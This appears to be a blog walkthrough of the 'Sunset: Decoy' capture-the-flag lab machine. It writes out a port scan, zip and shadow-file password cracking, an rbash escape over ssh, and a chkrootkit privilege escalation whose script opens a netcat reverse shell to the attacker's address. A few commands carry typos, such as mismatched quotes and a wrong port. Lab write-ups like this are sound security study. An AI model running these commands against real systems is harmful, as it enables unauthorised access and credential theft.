Sunset: Decoy Walkthrough

We start by scanning the host with nmap -A -T4 -p- 192.168.1.9 -vv

Port 80 is open and there is one file save.zip:

The file is password protected, but we can brute force it with “fcrackzip -u -D -p /root/pass/rockyou.txt save.zip”

Unzipping the file and we get:

Now we have the passwd file and the shadow file where we can use “john” to unshadow them and get the passwords:

unshadow passwd shadow > passlist.txt

john –wordlist=/root/pass/rockyou.txt passlist.txt

server           (296640a3b825115a47b68fc44501c828)

We login with ssh using these credentials, they worked but the problem is, the user is very limited and command restricted, even using “-t /bin/rbash” but the right order was “-t –noprofile”

`ssh 296640a3b825115a47b68fc44501c828@192.168.1.9 -t “bash  –noprofile”

To read the user.txt we use “/usr/bin/cat user/txt”

There is a file honeypot.decoy when we run it gave us some options:

The only logical options which it should work is 8 as we can check for running services:

I transferred the file psy32 to the target machine and ran it and we can see a lot of “chkrootkit” processes are running:

Now the “chkrootkit” has an exploit we can do and run it:

echo ‘#!/bin/bash’ > update

echo “/usr/bin/nc -e /bin/sh 192.168.1.11 4444’ >> update

chmod 777 update

We wait for a bit till the process run and then on our machine we will git a reverse shell from the listening port 444

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s